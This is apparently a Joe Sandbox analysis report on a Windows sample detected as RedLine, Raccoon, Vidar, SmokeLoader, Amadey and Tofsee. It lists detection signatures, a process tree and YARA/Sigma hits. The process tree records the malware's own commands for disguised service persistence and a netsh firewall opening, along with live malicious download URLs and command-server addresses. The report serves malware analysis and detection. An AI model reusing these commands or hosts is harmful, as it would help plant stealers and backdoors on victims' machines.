Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 0Cjy7Lkv1A.exe

Overview

General Information

Sample Name:0Cjy7Lkv1A.exe
Analysis ID:552945
MD5:eb023c854d3c8a24589e9294fd5d346e
SHA1:699eb8e25fcd583774381b9ff554c7e8442c8c43
SHA256:b602afd3f94c5820291f8319b23f20e5254212ba6aab49be0238d7067caca7b8
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected BatToExe compiled binary
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Social media urls found in memory data
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 0Cjy7Lkv1A.exe (PID: 4440 cmdline: "C:\Users\user\Desktop\0Cjy7Lkv1A.exe" MD5: EB023C854D3C8A24589E9294FD5D346E)
    • 0Cjy7Lkv1A.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\0Cjy7Lkv1A.exe" MD5: EB023C854D3C8A24589E9294FD5D346E)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 60C2.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Temp\60C2.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 2784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 7063.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\7063.exe MD5: 3754DB9964B0177B6E905999B6F18FD7)
        • A8FB.exe (PID: 4692 cmdline: C:\Users\user\AppData\Local\Temp\A8FB.exe MD5: 2650E6FA017E57264E55CB0078639A13)
          • cmd.exe (PID: 7092 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3496 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3220 cmdline: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5324 cmdline: C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2192 cmdline: "C:\Windows\System32\sc.exe" start uuqefjyt MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 4388 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • B3BA.exe (PID: 6964 cmdline: C:\Users\user\AppData\Local\Temp\B3BA.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • B3BA.exe (PID: 4264 cmdline: C:\Users\user\AppData\Local\Temp\B3BA.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • B3BA.exe (PID: 1756 cmdline: C:\Users\user\AppData\Local\Temp\B3BA.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 1BCC.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\1BCC.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 382E.exe (PID: 6140 cmdline: C:\Users\user\AppData\Local\Temp\382E.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
        • 5126.exe (PID: 6132 cmdline: C:\Users\user\AppData\Local\Temp\5126.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)
          • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6492 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ujhcrda (PID: 5724 cmdline: C:\Users\user\AppData\Roaming\ujhcrda MD5: EB023C854D3C8A24589E9294FD5D346E)
    • ujhcrda (PID: 5416 cmdline: C:\Users\user\AppData\Roaming\ujhcrda MD5: EB023C854D3C8A24589E9294FD5D346E)
  • svchost.exe (PID: 4192 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3252 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • szdcdkt.exe (PID: 2972 cmdline: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe" MD5: F23C1D7C6806E4BFAA8ABAD7CCC77AC1)
    • svchost.exe (PID: 6780 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 1624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ujhcrda (PID: 6104 cmdline: C:\Users\user\AppData\Roaming\ujhcrda MD5: EB023C854D3C8A24589E9294FD5D346E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
        00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000002F.00000003.564856564.00000000006B0000.00000004.00000001.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000002C.00000002.748388079.0000000005114000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 31 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  36.2.szdcdkt.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    39.2.svchost.exe.a50000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      1.2.0Cjy7Lkv1A.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                        13.1.ujhcrda.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          Click to see the 26 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe", ParentImage: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe, ParentProcessId: 2972, ProcessCommandLine: svchost.exe, ProcessId: 6780
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentProcessId: 4692, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\, ProcessId: 3496
                          Sigma detected: Suspicious Svchost ProcessShow sources
                          Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe", ParentImage: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe, ParentProcessId: 2972, ProcessCommandLine: svchost.exe, ProcessId: 6780
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentProcessId: 4692, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 4388
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A8FB.exe, ParentProcessId: 4692, ProcessCommandLine: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3220

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: 0Cjy7Lkv1A.exeVirustotal: Detection: 37%Perma Link
                          Source: 0Cjy7Lkv1A.exeReversingLabs: Detection: 53%
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\1BCC.exeReversingLabs: Detection: 63%
                          Source: C:\Users\user\AppData\Local\Temp\382E.exeMetadefender: Detection: 29%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\382E.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeMetadefender: Detection: 45%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\6674.exeReversingLabs: Detection: 46%
                          Source: C:\Users\user\AppData\Local\Temp\8008.exeReversingLabs: Detection: 63%
                          Machine Learning detection for sampleShow sources
                          Source: 0Cjy7Lkv1A.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\8008.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\9874.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\382E.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\szdcdkt.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8B25.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\6674.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\5126.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1BCC.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaJoe Sandbox ML: detected
                          Source: 17.3.7063.exe.4a0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 36.2.szdcdkt.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 36.2.szdcdkt.exe.670e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 17.2.7063.exe.480e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 36.3.szdcdkt.exe.690000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 36.2.szdcdkt.exe.eb0000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 19.2.A8FB.exe.550e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 39.2.svchost.exe.a50000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 19.3.A8FB.exe.570000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 19.2.A8FB.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeUnpacked PE file: 17.2.7063.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeUnpacked PE file: 19.2.A8FB.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeUnpacked PE file: 36.2.szdcdkt.exe.400000.0.unpack
                          Source: 0Cjy7Lkv1A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49771 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49792 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49863 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49865 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49879 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49883 version: TLS 1.2
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: shcore.pdb~Sihc source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.473871600.0000000004B27000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: powrprof.pdbxSohi source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7063.exe, 00000011.00000000.468936962.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: fltLib.pdblS[ha source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdbrSUhr source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: TC:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: C:\gebofa\95.pdb source: 0Cjy7Lkv1A.exe, 00000000.00000002.361830402.0000000000414000.00000002.00020000.sdmp, 0Cjy7Lkv1A.exe, 00000000.00000000.353857119.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000000.448285897.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000002.459349671.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000D.00000000.455076610.0000000000414000.00000002.00020000.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: C:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp
